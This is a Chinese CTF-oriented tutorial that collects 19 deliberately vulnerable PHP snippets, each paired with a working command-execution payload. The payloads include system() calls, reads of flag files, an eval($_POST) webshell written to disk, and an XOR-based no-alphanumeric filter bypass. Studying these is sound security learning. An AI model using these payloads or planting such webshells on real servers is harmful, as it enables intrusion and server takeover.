前言

代码审计总要遇到命令执行或者说RCE,打CTF的过程中难免不会碰见,毕竟PHP是世界上最好的语言,总结一下

命令执行函数

E.g.1
 <?php 
 error_reporting(0); 
 show_source(__FILE__); 
 $a = "$_GET[c]"; 
 $b = "$_GET[d]"; 
 $array[0] =$b; 
 $c = array_map($a,$array); 
 ?>

传入参数c和d,array_map函数作用将$a作为函数,$array作为参数,构造paylaod

?c=assert&d=system(%27ls%27);

E.g.2
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[b]";
$b = create_function('',$a);
$b();
?>

create_function 函数会创建一个匿名函数(lambda样式),在第一个echo中显示出名字,并在第二个echo语句中执行了此函数。

$b = create_function('',$a);

这里$a为函数,' '为参数

那么可以看作为

function lambda(){
•   echo ' ' ;
}

传入payload

b= ;}phpinfo();/*

在function函数中即

function lambda(){
    echo ' ' ;}phpinfo();/*
}

后面的内容注释掉了,即执行命令

E.g.3
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[d]";
$b='print'.$a.';';
$f = create_function('$a',$b);
$f($a)

跟上面一样,虽然有一点变形,但是再$b的打印上没有特殊之处,所以payload:

d=1;}system(%27ls%27);/*

一致。

E.g.4
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[b]";
assert($a);
?>

没什么特别之处,assert直接作为函数执行,payload:

?b=system(%27ls;%27)

E.g.5
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[b]";
$b = "$_GET[c]";
call_user_func($a,$b);
?>

call_user_func()函数的特点,知道后面的后面的$b为参数,前面的$a为函数即可

payload:

?b=system&c=whoami

E.g.6
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[b]";
$b = array($_GET['c']);
call_user_func_array($a,$b);
?>

payload:

?b=assert&c=system(%27whoami%27);

E.g.7
<?php
error_reporting(0);
show_source(__FILE__);
$_GET['a']($_GET['b']);
?>

传入参数a和b,一个作为函数执行,一个做位参数,构造payload:

?a=assert&b=system(%27ls%27)

E.g.8
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[b]";
eval($a);
?>

一句话木马有没有很熟悉,直接get方式传参给b即可,payload:

?b=system("ls");

E.g.9
<?php
show_source(__FILE__);
echo "<br>";
echo '请输入一个a的值';
echo "<br>";
error_reporting(0);
$price = $_GET['a'];
$code = 'echo $name. '.'的美元价格是' .$price.'; ';
$b = create_function('$name',$code);
$b('iphone');
?>

基本上属于3的内容加强版,重点就是需要进行闭合,,代码变多了,payload没有出入,重点还是再$code的位置

payload:

?a=1;}system(%27ls%27);/*

E.g.10
<?php
show_source(__FILE__);
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$database = array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . '"] , $b["' . $sort_by . '"]);';
usort($database,create_function('$a,$b',$sort_function));
?>

属于加强版本,$sort_function的内容进行闭合,也就是sort_by的参数值要实现闭合,构造payload:

?sort_by=%27"]);}system(%27whoami%27);/*

E.g.11
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[c]";
$b = preg_replace("/abc/e",$a,'abcd');
var_dump($b);
?>

虽然加了正则,但是并没有什么卵用,假把式,payload:

?c=system(%27ls%27);

E.g.12
<?php
show_source(__FILE__);
$commandExecution = "echo ";
echo "<br>";
system($commandExecution.$_GET['a']);
echo "<br>";
?>

payload

?a=<\?php\%20\@eval($_POST[a])\;%20\?>%20>2.php

一句话木马写入2.php

也有其它解法直接进行命令执行。

E.g.13
<?php
error_reporting(0);
show_source(__FILE__); 
$a = "$_GET[c]";
echo "<br>";
exec($a,$b);
var_dump($b);
?

exec()函数直接执行命令,那么payload

?c=whoami

E.g.14
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[c]";
echo shell_exec($a);
?

函数的特性shell_exec

?c=ls>2.txt

然后执行

?c=cat 2.txt

此时

E.g.15
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[c]";
echo "<br>";
echo `$a`;
?>

看到echo以及传入的字符串,方法类似于上面的一道

?c=cat%20flag.php>3.txt

直接访问3.txt即可,或者

?c=cat%203.txt

E.g.16
<?php
error_reporting(0);
show_source(__FILE__);
$a = "$_GET[c]";
passthru($a);
?>

payload:

?c=cat%20flag.php

E.g.17
<?php
error_reporting(0);
show_source(__FILE__); 
$cmd=$_GET['c']; 
$fd = popen($cmd, 'r'); 
while($s=fgets($fd)){ 
print_r($s); 
} 
?>

payload

?c=cat%20flag.php

E.g.18
<?php
  error_reporting(0);
  show_source(__FILE__); 
  $command=$_GET['c'];
  $descriptorspec=array( 
    0=>array('pipe','r'), 
    1=>array('pipe','w'),
    2=>array('pipe','w') 
  );
  $handle=proc_open($command,$descriptorspec,$pipes,NULL);
  if(!is_resource($handle)){
    die('proc_open failed');
  }
  while($s=fgets($pipes[1])){
    print_r($s);
  }
  while($s=fgets($pipes[2])){
    print_r($s);
  }
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($handle);
?>

payload

?c=cat%20flag.php

E.g.19 无字母shell
<?php
include 'flag.php';
if(isset($_GET['code'])){
  $code = $_GET['code'];
  if(strlen($code)>40){ //检测字符长度
    die("Long.");
  }
  if(preg_match("/[A-Za-z0-9]+/",$code)){ //限制字母和数字
    die("NO.");
  }
  @eval($code); //$code的值要为非字母和数字
}else{
  highlight_file(__FILE__);
}
//$hint = "php function getFlag() to get flag";
?>

绕过正则,传入的参数中不能含有大小写字母以及数字,使用异或的当时绕过正则即可

<?phpvar_dump('#'^'|'); var_dump('.'^'~');var_dump('/'^''); var_dump('|'^'/'); var_dump('{'^'/'); $__=("#"^"|").("."^"~").("/"^"").("|"^"/").("{"^"/");//变量$_值为字符串'POST'?>

no.flag中提示了flag在getflag()方法中,那么自然需要构造payload去调用getflag()方法,需要参数长度小于40且绕过正则,那么可以设想一下

function getflag(){

xxxxxxxxxxxxxxxx

}

@eval($code);

函数的调用就是类似于上面的过程,那么eval在执行的过程中$code并不能直接执行,参考上面的题7那么我传入的code的参数的形式为$_GET[]且需要调用getFlag()方法,因为考虑到需要无字母,所以结合异或,那么payload就是下面的内容:

?code=${"{{{"^"?<>/"}[""^"?"]();&_=getFlag

或者

?code=$="`{{{"^"?<>/";${$}_;&_=getFlag

这里

//_GET 的变形无字母shell

$_="`{{{"^"?<>/";

小结

大佬请绕路,如有错误欢迎师傅们指出。

实验推荐:PHP命令注入攻击(合天网安实验室)点击进入实操>>

更多网安工具及学习资料,扫码免费领:

PHP命令执行集锦的更多相关文章

  1. saltstack命令执行过程

    saltstack命令执行过程 具体步骤如下 Salt stack的Master与Minion之间通过ZeroMq进行消息传递,使用了ZeroMq的发布-订阅模式,连接方式包括tcp,ipc salt ...

  2. HFS远程命令执行漏洞入侵抓鸡黑阔服务器

    先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须 ...

  3. ping命令执行过程详解

    [TOC] ping命令执行过程详解 机器A ping 机器B 同一网段 ping通知系统建立一个固定格式的ICMP请求数据包 ICMP协议打包这个数据包和机器B的IP地址转交给IP协议层(一组后台运 ...

  4. 【MongoDB】6.关于MongoDB存储文件的 命令执行+代码执行

    参考:http://www.runoob.com/mongodb/mongodb-gridfs.html 1.命令执行 MongoDB GridFS GridFS 用于存储和恢复那些超过16M(BSO ...

  5. SQL Server数据库备份:通过Windows批处理命令执行

    通过Windows批处理命令执行SQL Server数据库备份 建立mybackup.bat ,输入以下内容直接运行该脚本,即可开始自动备份数据库也可把该脚本加入windows任务计划里执行. --- ...

  6. 图解“管道过滤器模式”应用实例:SOD框架的命令执行管道

    管道和过滤器 管道和过滤器是八种体系结构模式之一,这八种体系结构模式是:层.管道和过滤器.黑板.代理者.模型-视图-控制器(MVC) 表示-抽象-控制(PAC).微核.映像. 管道和过滤器适用于需要渐 ...

  7. "Java 反序列化"过程远程命令执行漏洞

    一.漏洞描述   国外 FoxGlove 安全研究团队于2015年11月06日在其博客上公开了一篇关于常见 Java 应用如何利用反序列化操作进行远程命令执行的文章.原博文所提到的 Java 应用都使 ...

  8. ASP代码审计 -4.命令执行漏洞总结

    命令执行漏洞: 保存为cmd.asp,提交链接: http://localhost/cmd.asp?ip=127.0.0.1 即可执行命令 <%ip=request("ip" ...

  9. Linux:命令执行顺序控制与管道

    命令执行顺序控制与管道 顺序执行 简单的顺序命令可以使用符号";"完成,如:sudo apt-get update;sudo apt-get install some-tool;s ...

随机推荐

  1. HDOJ 1249 三角形『平面分隔』

    很水拉   为了记规律- - 题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=1249 分隔平面公式 下面是我自己查找的公式,没有推到过程,但可以给一些链 ...

  2. Ubuntu 20.04.3 LTS + Intel Realsense 400系列

    Ubuntu 如何查看当前Ubuntu系统的版本,以及看自己的系统是否为LTS版本 lsb_release -a 如何查看Ubuntu系统的Linux系统版本,和GCC版本 cat /proc/ver ...

  3. pytest(6)-Fixture(固件)

    什么是固件 Fixture 翻译成中文即是固件的意思.它其实就是一些函数,会在执行测试方法/测试函数之前(或之后)加载运行它们,常见的如接口用例在请求接口前数据库的初始连接,和请求之后关闭数据库的操作 ...

  4. 帆软报表(finereport)图表操作细节

    图表间之间的组件间隔:body-->属性-->布局-->组件间隔 决策报表背景水印:body-->属性-->水印 仪表盘指针/枢纽/背景颜色:样式-->系列 柱形图 ...

  5. Keycloak 团队宣布他们正在弃用大多数 Keycloak 适配器,包括Spring Security和Spring Boot

    2月14日,Keycloak 团队宣布他们正在弃用大多数 Keycloak 适配器. 其中包括Spring Security和Spring Boot的适配器,这意味着今后Keycloak团队将不再提供 ...

  6. Solution -「ABC 213H」Stroll

    \(\mathcal{Description}\)   Link.   给定一个含 \(n\) 个结点 \(m\) 条边的简单无向图,每条边的边权是一个常数项为 \(0\) 的 \(T\) 次多项式, ...

  7. ssh 主机之间免密配置脚本

    文章目录 单向免密 `expect` 免交互 `sshpass` 免交互 相互免密 单向免密 expect 免交互 注意修改脚本内的 your_password 为 远程主机用户的密码 脚本内的 &q ...

  8. Dubbo扩展点应用之六服务动态降级

    服务降级,当服务器压力剧增的情况下,根据当前业务情况及流量对一些服务有策略的降低服务级别以释放服务器资源保证核心任务的政策运行. 为什么要使用服务降级呢?这是为了防止分布式服务发送雪崩效应,也就是蝴蝶 ...

  9. 聊聊几个阿里 P8、P9 程序员的故事

    大家好,我是对白. 阿里 P8 程序员年薪百万已经是公开的秘密了,有人关心他们年薪百万,而我更加关注阿里这些 P8.P9 程序员的成长故事,在聊这些大牛的故事之前,跟大家稍微简单聊下阿里技术人等级制度 ...

  10. 创建jsp页面出现The superclass "javax.servlet.http.HttpServlet" was not found on the Java Build Path错误

    原因未添加tomcat服务器 第一步: 第二步: